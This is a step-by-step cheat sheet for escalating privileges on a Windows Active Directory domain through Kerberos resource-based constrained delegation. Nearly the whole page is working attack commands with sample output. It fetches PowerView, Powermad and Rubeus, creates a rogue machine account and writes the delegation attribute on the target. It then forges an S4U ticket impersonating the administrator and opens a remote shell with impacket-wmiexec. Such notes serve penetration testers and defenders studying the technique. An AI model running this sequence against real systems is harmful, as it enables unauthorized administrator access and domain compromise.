Windows PrivEsc with Kerberos

Privilege Escalation

First off, download two PS scripts in local machine..

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
Copied!

Then upload them to the target machine.

# Evil-WinRM
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
Copied!

1. Check User's Permission and Windows Versions

Check if users are allowed to create a new computer object on the domain.

Get-DomainObject -Identity "dc=example,dc=com" -Domain example.com

# -------------------------
# Result
ms-ds-machineaccountquota: 10
Copied!

And check if the machine is at least Windows Server 2012.

Get-DomainController

# -------------------------
# Result
OSVersion: Windows Server 2022 Standard
Copied!

Additionally, check if the target computer does not have the attributes “msds-allowedtoactionbehalfofotheridentity” set.

hostname
Get-NetComputer <hostname> | Select-Object -Property name, msds-allowedtoactionbehalfofotheridentity

# ------------------
# Result
name msds-allowedtoactionbehalfofotheridentity
---- ----------------------------------------
<HOSTNAME>   {1, 0, 4, 128...}
Copied!

2. Create a New Computer

Now you can create a new computer object.

New-MachineAccount -MachineAccount TEST01 -Password $(ConvertTo-SecureString '12345' -AsPlainText -Force)
Get-DomainComputer test01

# ----------------------
# Result (copy the id)
objectsid: S-1-5-21-1677581083-3380853377-188903654-5103
Copied!

Create a new raw security descriptor.

# Paste the objectsid which was copied in previous section.
$objectsid = "S-1-5-21-1677581083-3380853377-188903654-5103"

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$objectsid)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer $(hostname) | Set-DomainObject -Set @{'msds-allowedtoactionbehalfofotheridentity'=$SDBytes} -Verbose
Copied!

3. Impersonate to Get a Ticket

Download Rubeus.exe in local machine.

wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Copied!

Then upload it to the target machine and generate a RC4 hash.

# Evil-WinRM
upload Rubeus.exe
.\Rubeus.exe hash /password:12345 /user:test01 /domain:example.com

# -------------------------
# Result (copy the rc4 hash)
rc4_hmac: 32ED87BDB5FDC5E9CBA88547376818D4

Copied!

We can request a Kerberos ticket for a new machine account while impersonating an administrator.

.\Rubeus.exe s4u /user:test01$ /rc4:<rc4-hash> /impersonateuser:administrator /msdsspn:cifs/<hostname>.example.com /ptt

# --------------
# Result (copy the output long hash at the last)
Copied!

Then generate a ticket (.kirbi).

[IO.File]::WriteAllBytes("C:\Users\<username>\Documents\ticket.kirbi", [Convert]::FromBase64String("<new-output-hash>"))
download ticket.kirbi
Copied!

4. Make the Ticket Usable and Use It

Download “ticket_converter.py”.

wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
Copied!

Destroy any tickets in local machine, and convert the ticket to Linux usable, then set the new ticket’s path.

kdestroy
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
Copied!

We can use the ticket to get a shell.

impacket-wmiexec example.com/administrator@<hostname>.example.com -no-pass -k